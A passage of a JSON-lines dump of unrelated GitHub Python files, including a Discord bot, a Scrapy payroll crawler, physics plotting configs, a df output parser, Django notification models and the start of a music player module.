скачивается\")\n\n data = get_hotel(url[\"url\"], url[\"id_hotel\"], driver, logger)\n\n index_urls += 1\n\n if len(data[\"rooms\"]) == 0:\n path_dir = f\"hotels/empty/{url['city']}/\"\n else:\n path_dir = f\"hotels/normal/{url['city']}/\"\n\n if not os.path.exists(path_dir):\n os.mkdir(path_dir)\n\n with open(os.path.join(path_dir, f\"{url['id_hotel']}.json\"), 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False)\n logger.log(f\"{os.path.join(path_dir, url['id_hotel'] + '.json')} записан в файл\")\n # logger.log(f\"{url['id_hotel']} записан в файл\")\n except:\n error_type, error_value, tb = sys.exc_info()\n traceback_msg = \"\".join(traceback.format_tb(tb))\n error = f\"{error_type.__name__} - {error_value}\\n {traceback_msg}\"\n # logger.log(error)\n logger.log(error)\n\nsplitted_url = split_list(urls, simultaneous_parsing)\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=simultaneous_parsing) as executor:\n futures = [executor.submit(while_hotel, splitted_url[i], i, round(i*(len(urls) / simultaneous_parsing)), there_are_already_hotels, drivers[i]) for i in range(simultaneous_parsing)]\n","repo_name":"KDragonic/HotelBase","sub_path":"p_hotel.py","file_name":"p_hotel.py","file_ext":"py","file_size_in_byte":18962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31979477775","text":"import discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot\nimport json\nimport platform\nimport random\nimport sys\nimport os\nfrom mcstatus import MinecraftServer\n\nif not os.path.isfile(\"config.json\"):\n sys.exit(\"'config.json' not found! Please add it and try again.\")\nelse:\n with open(\"config.json\") as file:\n config = json.load(file)\n\ndescription = '''An early version of the new Discord bot for Cataclysm'''\n\nbot = commands.Bot(command_prefix=config[\"bot_prefix\"], description=description)\n\nmcServer = MinecraftServer.lookup(config[\"minecraft_server_address\"])\n\n@bot.event\nasync def on_ready():\n print('Logged in as {bot.user} (ID: {bot.user.id})')\n\n@bot.command()\nasync def add(ctx, left: int, right: int):\n\tawait ctx.send(left + right)\n\n@bot.command()\nasync def status(ctx):\n\tstatus = mcServer.status()\n\ttry:\n\t\tstatus = mcServer.status()\n\t\tawait ctx.send(\"There are {0} players online\".format(status.players.online))\n\texcept:\n\t\tawait ctx.send(\"Error reaching the server\")\n\n\n\nbot.run(config[\"token\"])\n","repo_name":"ian-pitman/Catabot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71595587764","text":"x=input()\nn=int(input())\na='abcdefghijklmnopqrstuvwxyz'\nd={i:j for i,j in zip(x,a)} # 対応表\nsl=[]\nfor _ in range(n):\n s=input()\n t=''.join([d[c] for c in s])\n sl.append((t,s))\nsl.sort()\nfor s in sl:\n print(s[1])\n","repo_name":"ymsk-sky/atcoder","sub_path":"abc219/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18269387136","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport os\n\nclass crawler(scrapy.Spider):\n name=\"openPayrollCrawler\"\n EMPLOYEE_ROW_CSS = \"tr[itemprop='employee']\"\n EMPLOYEE_NAME_CSS = \"span[itemprop='name']::text\"\n EMPLOYEE_NEXT_BUTTON_XPATH = '//a[@rel=\"next\"]/@href'\n EMPLOYEE_DETAIL_BUTTON = 
\":last-child>a::attr(href)\"\n EMPLOYEE_DETAIL_NAME = \"h1>span[itemprop='name']::text\"\n EMPLOYEE_DETAIL_TITLE = \"span[itemprop='jobTitle']::text\"\n EMPLOYEE_DETAIL_SALARY = \"span[data-toggle='popover']::text\"\n\n def __init__(self, location, file_out = \"data.csv\"):\n self.start_urls = [f\"https://openpayrolls.com/search/employees/{location}\"]\n open(file_out, 'w+').close() # Create the file, clear it if it already exists\n self.file_out = file_out\n \n\n def parse(self, response):\n for emp in response.css(self.EMPLOYEE_ROW_CSS):\n print(f\"Parsing: {emp.css(self.EMPLOYEE_NAME_CSS).get()}\")\n link = emp.css(self.EMPLOYEE_DETAIL_BUTTON).extract()[0]\n print(link)\n yield response.follow(response.urljoin(link), callback=self.parse_details)\n print(\"Following link\")\n link = emp.xpath(self.EMPLOYEE_NEXT_BUTTON_XPATH).extract()[0]\n print(link)\n yield response.follow(response.urljoin(link), callback=self.parse)\n\n def parse_details(self, response):\n print(\"PARSING DETAILS\")\n with open(self.file_out, 'a') as f:\n f.write(response.css(self.EMPLOYEE_DETAIL_NAME).get().replace(\",\",'&c;') + ',')\n f.write(response.css(self.EMPLOYEE_DETAIL_TITLE).get().replace(\",\",'&c;') + ',')\n f.write(response.css(self.EMPLOYEE_DETAIL_SALARY).get().replace(\",\",'') + '\\n')\n \nif __name__ == \"__main__\":\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n\n process.crawl(crawler, location=\"university-of-kentucky\", file_out=\"uk_data.csv\")\n process.start()","repo_name":"AgentEnder/OpenPayrollCrawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32070308458","text":"from numpy.random import random\nfrom numpy import sin,cos, true_divide\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.animation import FuncAnimation\n\ndef SieveOfEratosthenes(n):\n \n prime = [True for i in range(n + 1)]\n p = 2\n while (p * p <= n):\n # If prime[p] is not changed, then it is a prime\n if (prime[p] == True):\n \n # Update all multiples of p\n for i in range(p ** 2, n + 1, p):\n prime[i] = False\n p += 1\n prime[0]= False\n prime[1]= False\n # Print all prime numbers\n primelist = list()\n for p in range(n + 1):\n if prime[p]:\n primelist.append(p)#Use print(p) for python 3\n return primelist\n \nxdata = list()\nydata = list()\nzdata = list()\nxdata.append(0)\nydata.append(0)\nzdata.append(0)\n\nprimes = SieveOfEratosthenes(10000)\nprimes.insert(0,0)\nxprev = False\nyprev = False\nzprev = False\n\nfor i in range(0,len(primes)-1):\n if zprev == True or i == 0:\n xdata.append(xdata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i])))\n ydata.append(ydata[i])\n zdata.append(zdata[i])\n xprev = True\n zprev = False\n elif xprev == True:\n xdata.append(xdata[i])\n ydata.append(ydata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i]) ))\n zdata.append(zdata[i])\n xprev = False\n yprev = True\n elif yprev == True:\n xdata.append(xdata[i])\n ydata.append(ydata[i])\n zdata.append(zdata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i]) ))\n zprev = True\n yprev = False\n\n\nfig = plt.figure(frameon=False,figsize=(16,9))\n# Create 3D container\nax = plt.axes(projection = '3d')\nax.axis('off')\n# Visualize 3D scatter plot\nax.plot3D(xdata, ydata, zdata)\n# Give 
labels\nplt.show()\n","repo_name":"FililiX/CRC","sub_path":"bckup.py","file_name":"bckup.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31110034952","text":"import logging\nimport time \n\n# Create logger\n\nlogging.basicConfig(filename = \"/Users/User/Desktop/Python/Python_Socratica/Exceptions/problems.txt\", level = logging.DEBUG)\n\nlogger = logging.getLogger()\n\ndef read_file_timed(path):\n    \"\"\"Return the contents of the file at 'path' and measure time required.\"\"\"\n\n    start_time = time.time() # record the time when used\n    try:\n        f = open(path, mode=\"rb\")\n        data = f.read()\n    except FileNotFoundError as err:\n        logger.error(err)\n        raise\n    else:\n        # no exception was raised: close the file before returning its contents\n        f.close()\n        return data\n    finally:\n        stop_time = time.time()\n        dt = stop_time - start_time # subtracts the start and stop time\n        logger.info(\"Time required for {file} = {time}\".format(file=path, time = dt))\n\npath = '/Users/User/Desktop/Python/Python_Socratica/TextFiles/oceans.txt'\n\ndata = read_file_timed(path)\n","repo_name":"Shaun103/Python_Notes","sub_path":"Python_Socratica/Exceptions/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32961615683","text":"from cv2 import FONT_HERSHEY_SIMPLEX\n\nWINDOW = {\n    'NAME': 'Parking lots'\n}\n\nPARKING = {\n    'WIDTH': 107,\n    'HEIGHT': 48\n}\n\nSPACE_COLORS = {\n    'AVAILABLE': (74, 242, 41),\n    'NOT_AVAILABLE': (24, 24, 244)\n}\n\nTEXT = {\n    'FONT': FONT_HERSHEY_SIMPLEX,\n    'SIZE': 2,\n    'SCALE': 0.65,\n    'COLORS': {\n        'RED': (24, 24, 244),\n        'BLUE': (122, 64, 14),\n        'ORANGE': (21, 130, 239)\n    }\n}\n","repo_name":"NEVI0/parking-lot-detector","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7265829080","text":"\nmonitors = [\n  { \"name\":\"jetCSV4\",  \"unit\":\"Sum of CSV2 of 4 Jets \", \"var\":\"jet_csv[0]+jet_csv[1]+jet_csv[2]+jet_csv[3]\", \"xbin_set\":[80,0,4] },\n  { \"name\":\"MET\",   \"unit\":\"Missing E_{T} without HF (GeV)\",\"var\":\"metNoHF\",     \"xbin_set\":[60,0,300] },\n  { \"name\":\"METpf\",   \"unit\":\"Missing E_{T} (GeV)\",  \"var\":\"met\",     \"xbin_set\":[60,0,300] },\n  { \"name\":\"ZMass\",  \"unit\":\"Dilepton mass (GeV/c^{2}) \",  \"var\":\"ll_zmass\",     \"xbin_set\":[60,0,300] },\n  { \"name\":\"nGoodPV\",   \"unit\":\"# of good vertex \",  \"var\":\"nGoodPV\",     \"xbin_set\":[70,0,70] },\n  { \"name\":\"nPV\",   \"unit\":\"# of vertex \",  \"var\":\"nPV\",     \"xbin_set\":[70,0,70] },\n  { \"name\":\"Stat\",   \"unit\":\"Stat \",  \"var\":\"met\",     \"xbin_set\":[1,0,10000] },\n  { \"name\":\"METPHI\",  \"unit\":\"Missing E_{T} without HF #phi\", \"var\":\"metNoHFphi\",\"xbin_set\":[40,-4,4] },\n  { \"name\":\"METmva\",   \"unit\":\"MVA Missing E_{T} (GeV)\",  \"var\":\"metPfMva\",     \"xbin_set\":[60,0,300] },\n  { \"name\":\"METPuppi\",   \"unit\":\"Puppi Missing E_{T} (GeV)\",  \"var\":\"metPuppi\",     \"xbin_set\":[60,0,300] },\n  { \"name\":\"nBJet20L\",   \"unit\":\"b-Jet20 multiplicity loose \",  \"var\":\"nBJet20L\",     \"xbin_set\":[8,0,8] },\n  { \"name\":\"nBJet20M\",   \"unit\":\"b-Jet20 multiplicity medium \",  \"var\":\"nBJet20M\",     \"xbin_set\":[6,0,6] },\n  { \"name\":\"NJet20\",   \"unit\":\"Jet20 multiplicity \",  \"var\":\"nJet20\",     \"xbin_set\":[10,0,10] },\n  { \"name\":\"nBJet20T\", \"unit\":\"b-Jet20 multiplicity 
tight \", \"var\":\"nBJet20T\", \"xbin_set\":[6,0,6] },\n { \"name\":\"nBJet30L\", \"unit\":\"b-Jet30 multiplicity loose \", \"var\":\"nBJet30L\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet30M\", \"unit\":\"b-Jet30 multiplicity medium \", \"var\":\"nBJet30M\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet30\", \"unit\":\"Jet30 multiplicity \", \"var\":\"nJet30\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet30T\", \"unit\":\"b-Jet30 multiplicity tight \", \"var\":\"nBJet30T\", \"xbin_set\":[6,0,6] },\n { \"name\":\"lep1Pt\", \"unit\":\"Leading lepton p_{T} (GeV/c) \", \"var\":\"ll_lep1_pt\", \"xbin_set\":[40,0,200] },\n { \"name\":\"lep2Pt\", \"unit\":\"Sceond lepton p_{T} (GeV/c) \", \"var\":\"ll_lep2_pt\", \"xbin_set\":[40,0,200] },\n { \"name\":\"lep1Eta\", \"unit\":\"Leading lepton #eta \", \"var\":\"ll_lep1_eta\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"lep2Eta\", \"unit\":\"Sceond lepton #eta \", \"var\":\"ll_lep2_eta\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"lep1Phi\", \"unit\":\"Leading lepton #phi \", \"var\":\"ll_lep1_phi\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"lep2Phi\", \"unit\":\"Sceond lepton #phi \", \"var\":\"ll_lep2_phi\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"lep1Iso\", \"unit\":\"Leading lepton Iso_{rel} \", \"var\":\"ll_lep1_iso\", \"xbin_set\":[20,0,1] },\n { \"name\":\"lep2Iso\", \"unit\":\"Sceond lepton Iso_{rel} \", \"var\":\"ll_lep2_iso\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet1Pt\", \"unit\":\"p_T of 1st leading Jet \", \"var\":\"jet_pt[0]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet2Pt\", \"unit\":\"p_T of 2nd leading Jet \", \"var\":\"jet_pt[1]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet3Pt\", \"unit\":\"p_T of 3rd leading Jet \", \"var\":\"jet_pt[2]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet4Pt\", \"unit\":\"p_T of 4th leading Jet \", \"var\":\"jet_pt[3]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet1Eta\", \"unit\":\"#eta of 1st leading Jet \", \"var\":\"jet_eta[0]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet2Eta\", \"unit\":\"#eta of 2nd leading Jet \", \"var\":\"jet_eta[1]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet3Eta\", \"unit\":\"#eta of 3rd leading Jet \", \"var\":\"jet_eta[2]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet4Eta\", \"unit\":\"#eta of 4th leading Jet \", \"var\":\"jet_eta[3]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet1Phi\", \"unit\":\"#phi of 1st leading Jet \", \"var\":\"jet_phi[0]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet2Phi\", \"unit\":\"#phi of 2nd leading Jet \", \"var\":\"jet_phi[1]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet3Phi\", \"unit\":\"#phi of 3rd leading Jet \", \"var\":\"jet_phi[2]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet4Phi\", \"unit\":\"#phi of 4th leading Jet \", \"var\":\"jet_phi[3]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet1CSV\", \"unit\":\"CSV2 of 1st leading Jet \", \"var\":\"jet_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet2CSV\", \"unit\":\"CSV2 of 2nd leading Jet \", \"var\":\"jet_csv[1]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet3CSV\", \"unit\":\"CSV2 of 3rd leading Jet \", \"var\":\"jet_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet4CSV\", \"unit\":\"CSV2 of 4th leading Jet \", \"var\":\"jet_csv[3]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP1CSV\", \"unit\":\"CSV2 of 1st leading JetPuppi \", \"var\":\"jetPuppi_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP2CSV\", \"unit\":\"CSV2 of 2nd leading JetPuppi \", \"var\":\"jetPuppi_csv[1]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP3CSV\", \"unit\":\"CSV2 of 3rd 
leading JetPuppi \", \"var\":\"jetPuppi_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP4CSV\", \"unit\":\"CSV2 of 4th leading JetPuppi \", \"var\":\"jetPuppi_csv[3]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP1Pt\", \"unit\":\"p_T of 1st leading JetPuppi \", \"var\":\"jetPuppi_pt[0]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP2Pt\", \"unit\":\"p_T of 2nd leading JetPuppi \", \"var\":\"jetPuppi_pt[1]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP3Pt\", \"unit\":\"p_T of 3rd leading JetPuppi \", \"var\":\"jetPuppi_pt[2]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP4Pt\", \"unit\":\"p_T of 4th leading JetPuppi \", \"var\":\"jetPuppi_pt[3]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"nBJet20LPuppi\", \"unit\":\"b-Jet20Puppi multiplicity loose \", \"var\":\"nBJet20LPuppi\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet20MPuppi\", \"unit\":\"b-Jet20Puppi multiplicity medium \", \"var\":\"nBJet20MPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet20Puppi\", \"unit\":\"Jet20Puppi multiplicity \", \"var\":\"nJet20Puppi\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet20TPuppi\", \"unit\":\"b-Jet20Puppi multiplicity tight \", \"var\":\"nBJet20TPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"nBJet30LPuppi\", \"unit\":\"b-Jet30Puppi multiplicity loose \", \"var\":\"nBJet30LPuppi\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet30MPuppi\", \"unit\":\"b-Jet30Puppi multiplicity medium \", \"var\":\"nBJet30MPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet30Puppi\", \"unit\":\"Jet30Puppi multiplicity \", \"var\":\"nJet30Puppi\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet30TPuppi\", \"unit\":\"b-Jet30Puppi multiplicity tight \", \"var\":\"nBJet30TPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"Nlep\", \"unit\":\"number of lepton \", \"var\":\"lepton_N\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"Nmu\", \"unit\":\"number of muon \", \"var\":\"Nmu\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NmuIso\", \"unit\":\"number of muon \", \"var\":\"NmuIso\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"Nel\", \"unit\":\"number of electron \", \"var\":\"Nel\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NelIso\", \"unit\":\"number of electron \", \"var\":\"NelIso\", \"xbin_set\":[5,0,5] },\n]\n\nmonitors2d = {\n\"Mon1\" : [\n { \"name\":\"jet1CSV\", \"unit\":\"CSV2 of 1st leading Jet \", \"var\":\"jet_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet2CSV\", \"unit\":\"CSV2 of 2nd leading Jet \", \"var\":\"jet_csv[1]\", \"xbin_set\":[20,0,1] },\n],\n\"Mon2\" : [\n { \"name\":\"jet3CSV\", \"unit\":\"CSV2 of 3rd leading Jet \", \"var\":\"jet_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet4CSV\", \"unit\":\"CSV2 of 4th leading Jet \", \"var\":\"jet_csv[3]\", \"xbin_set\":[20,0,1] },\n],\n#\"Mon27\" : [\n# { \"name\":\"NJet\", \"unit\":\"Jet multiplicity \", \"var\":\"nJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"nBJetL\", \"unit\":\"b-Jet multiplicity loose \", \"var\":\"nBJetL\", \"xbin_set\":[8,0,8] },\n# { \"name\":\"nBJetM\", \"unit\":\"b-Jet multiplicity medium \", \"var\":\"nBJetM\", \"xbin_set\":[8,0,8] },\n# { \"name\":\"nBJetT\", \"unit\":\"b-Jet multiplicity tight \", \"var\":\"nBJetT\", \"xbin_set\":[8,0,8] },\n#],\n#\"Mon27\" : [\n# { \"name\":\"NJet\", \"unit\":\"Jet multiplicity \", \"var\":\"nJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"genNJet\", \"unit\":\"genJet multiplicity \", \"var\":\"NgenJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"Category\", \"unit\":\"Category \", \"var\":\"Category\", \"xbin_set\":[5,0,5] },\n#],\n#\"Mon28\" : [\n## { \"name\":\"Nmu\", 
\"unit\":\"number of muon \", \"var\":\"Nmu\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NmuIso\", \"unit\":\"number of muon \", \"var\":\"NmuIso\", \"xbin_set\":[5,0,5] },\n## { \"name\":\"Nel\", \"unit\":\"number of electron \", \"var\":\"Nel\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NelIso\", \"unit\":\"number of electron \", \"var\":\"NelIso\", \"xbin_set\":[5,0,5] },\n#],\n}\n","repo_name":"YoungKwonJo/Analysis","sub_path":"CATTools/plots/monitors_cfi.py","file_name":"monitors_cfi.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37965061477","text":"# -*- coding: utf-8 -*-\n\nname = u'pbr'\n\nversion = '3.1.1'\n\ndescription = \\\n \"\"\"\n pbr library \n \"\"\"\n\nrequires = [ ]\n\nvariants = []\n\ndef commands():\n import os\n \n pbr_libs_path = os.path.join(getenv(\"PYTHON_LIBS_PATH\"), \"pbr\", \"%s\"%version)\n\n # env.PATH.append(os.path.join(pbr_libs_path, 'lib'))\n\n env.PYTHONPATH.append(os.path.join(pbr_libs_path, 'lib'))\n","repo_name":"cashmerepipeline/CashmereRez","sub_path":"PythonLibraries/pbr/3.1.1/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13910029689","text":"# -*- coding: utf-8 -*-\n# Author: Satoru SATOH \n# License: GPLv3+\n#\n\"\"\"df output formats:\n1:\nFilesystem 1K-ブロック 使用 使用可 使用% マウント位置\n/dev/mapper/vg_rhel6client1-lv_root\n 4684748 2668868 1777904 61% /\ntmpfs 510292 0 510292 0% /dev/shm\n/dev/vda1 495844 73591 396653 16% /boot\n\n2:\nファイルシス 1K-ブロック 使用 使用可 使用% マウント位置\ndevtmpfs 8164368 0 8164368 0% /dev\ntmpfs 8209916 0 8209916 0% /dev/shm\ntmpfs 8209916 21596 8188320 1% /run\ntmpfs 8209916 0 8209916 0% /sys/fs/cgroup\n/dev/mapper/vg0-lv_root 1920455616 836477948 986401120 46% /\ntmpfs 8209916 0 8209916 0% /tmp\n/dev/sda1 194241 101223 78682 57% /boot\n/dev/mapper/vg0_lv_data 1952559608 1187673728 764885880 61% /srv/data\n\"\"\"\nimport logging\nimport sos_analyzer.scanner.base\n\n\nLOGGER = logging.getLogger(__name__)\n\nSTATES = (AT_HEADER, IN_ENTRIES) = (\"at_header\", \"in_entries\")\n\nFS_RE = r\"^(?P[a-z/]\\S+)\"\nFS_REST_RE = r\"\\s+(?P\\d+)\\s+\" + \\\n r\"(?P\\d+)\\s+(?P\\d+)\\s+\" + \\\n r\"(?:(?P\\d+)%|-)\\s+(?P/\\S*)$\"\n\nFS_ML_0_RE = FS_RE + r\"$\"\nFS_ML_1_RE = r\"^\" + FS_REST_RE\nFS_SL_RE = FS_RE + FS_REST_RE\nIGNORE_RE = r\"^\\#.*$\"\n\nCONF = dict(initial_state=AT_HEADER,\n patterns=dict(ignore=IGNORE_RE,\n fs_multilines_0=FS_ML_0_RE,\n fs_multilines_1=FS_ML_1_RE,\n fs_line=FS_SL_RE))\n\n\nclass Scanner(sos_analyzer.scanner.base.BaseScanner):\n\n name = input_name = \"df\"\n conf = CONF\n state = initial_state = AT_HEADER\n entry = {}\n\n def parse_impl(self, state, line, i, *args, **kwargs):\n \"\"\"\n :param state: A dict object represents internal state\n :param line: Content of the line\n :param i: Line number in the input file\n :return: A dict instance of parsed result\n \"\"\"\n if self.state == AT_HEADER: # Use self.state instead of state passed.\n self.state = IN_ENTRIES\n LOGGER.debug(\"state changed: %s -> %s, line=%s\",\n AT_HEADER, IN_ENTRIES, line)\n return None\n\n if self.match(\"ignore\", line):\n # LOGGER.debug(\"ignored: line=%s\", line)\n return None\n\n m = self.match(\"fs_line\", line)\n if m:\n # LOGGER.debug(\"line=%s, matched=\", line)\n return m.groupdict()\n\n m = self.match(\"fs_multilines_0\", line)\n if m:\n self.entry = m.groupdict()\n # LOGGER.debug(\"line=%s, 
matched=\", line)\n return None\n\n m = self.match(\"fs_multilines_1\", line)\n if m:\n entry = self.entry.copy()\n entry.update(m.groupdict())\n self.entry = {}\n # LOGGER.debug(\"line=%s, matched=\", line)\n return entry\n\n return None\n\n# vim:sw=4:ts=4:et:\n","repo_name":"ssato/sos-analyzer","sub_path":"sos_analyzer/scanner/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"12641194206","text":"from django.db import models\nfrom django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Notification(models.Model):\n \"\"\"\n Notification\n \"\"\"\n class Meta:\n verbose_name = _('notification')\n verbose_name_plural = _('notifications')\n ordering = ['order']\n\n objects = models.Manager() # linters don't worry, be happy\n\n code_name = models.CharField(\n max_length=40,\n default='',\n blank=False,\n null=False,\n unique=True,\n verbose_name=_('code name')\n )\n order = models.PositiveIntegerField(\n blank=True,\n null=True,\n verbose_name=_('order'),\n )\n name = models.CharField(\n max_length=100,\n default='',\n blank=True,\n null=True,\n verbose_name=_('name')\n )\n description = models.CharField(\n max_length=250,\n default='',\n blank=True,\n null=True,\n verbose_name=_('description')\n )\n header_template = models.TextField(\n default='',\n blank=True,\n verbose_name=_('header template')\n )\n body_template = models.TextField(\n default='',\n blank=True,\n verbose_name=_('body template')\n )\n\n def __str__(self):\n return str(self.name or self.code_name)\n\n\nclass UserNotification(models.Model):\n \"\"\"\n User notification\n \"\"\"\n class Meta:\n verbose_name = _('user notification')\n verbose_name_plural = _('user notifications')\n\n objects = models.Manager() # linters don't worry, be happy\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('user'),\n related_name='notifications',\n )\n\n notification = models.ForeignKey(\n Notification, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('notification'),\n related_name='users',\n )\n\n enabled = models.BooleanField(\n default=True,\n verbose_name=_('enabled')\n )\n\n def __str__(self):\n return \"%s - %s\" % (\n self.user, self.notification.name or self.notification.code_name)\n\n\nclass IncomeMail(models.Model):\n sender = models.CharField(\n max_length=200,\n blank=False,\n )\n recipient = models.CharField(\n max_length=200,\n blank=False,\n )\n sender_mail = models.CharField(\n max_length=200,\n blank=False,\n )\n recipient_mail = models.CharField(\n max_length=200,\n blank=False,\n )\n headers = models.TextField(\n blank=False,\n )\n body = models.TextField(\n default='',\n blank=True,\n )\n","repo_name":"kozzztik/tulius","sub_path":"tulius/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"32746229998","text":"import sys\nimport os\nimport msvcrt\nimport random\n#Check if script is called as main module\nimport sys\nif __name__ == \"__main__\":\n\tprint(\"\\nThis module is not meant to be executed standalone!\")\n\tsys.exit(0)\n\nfrom time import sleep\nimport json\n\nos.environ[\"PYGAME_HIDE_SUPPORT_PROMPT\"] = \"hide\"\nimport pygame\n\nimport patapvars\nfrom patapclasses import globals, nowPlaying, pressedCharacter, 
PlaylistData\n\ndef saveFiles():\n\t#Save options\n\tpatapvars.options[\"volume\"] = pygame.mixer_music.get_volume()\n\twith open(patapvars.scriptDir + \"/options.json\",\"w\") as file:\n\t\tjson.dump(patapvars.options, file, indent=4)\n\n\t#Append played songs to log\n\twith open(patapvars.scriptDir + \"/play.log\",\"a\") as file:\n\t\tif not nowPlaying.logged:\n\t\t\tfile.write(nowPlaying.path + \"\\n\")\n\t\t\tnowPlaying.logged = True\ndef countfiles(path):\n\treturn len([entry for entry in os.scandir(path) if entry.is_file() and entry.name.endswith(\".mp3\")])\ndef setGlobalChar(event):\n\tpressedCharacter.globalChar = event\ndef getChar():\n\twhile patapvars.shouldRun:\n\t\tpressedCharacter.char = msvcrt.getwch()\ndef loading_animation(str):\n\tarray = [\"/\", \"—\", \"\\\\\", \"|\"]\n\tn = 0\n\twhile patapvars.loadingAnimation:\n\t\tprint(\"\\r\" + array[n] + \" \" + str, end=\"\")\n\t\tsleep(0.15)\n\t\tif n == 3:\n\t\t\tn = 0\n\t\telse:\n\t\t\tn += 1\n\tsys.exit(0)\ndef wait(seconds = 0.2):\n\tpressedCharacter.char = \"\"\n\tsleep(seconds)\ndef lineBreak():\n\tif (globals.lastCommandWasVolume):\n\t\tglobals.lastCommandWasVolume = False\n\t\tprint()\ndef play(files):\n\tif len(files) == 1:\n\t\ttype = \"song\"\n\telif len(files) > 1:\n\t\ttype = \"playlist\"\n\twhile patapvars.shouldRun:\n\t\tif globals.shouldRunB:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.USEREVENT + 1:\n\t\t\t\t\tsaveFiles() #Save files\n\t\t\t\t\tif patapvars.loopSong:\n\t\t\t\t\t\tpygame.mixer_music.play()\n\n\t\t\t\t\t\t#Add to 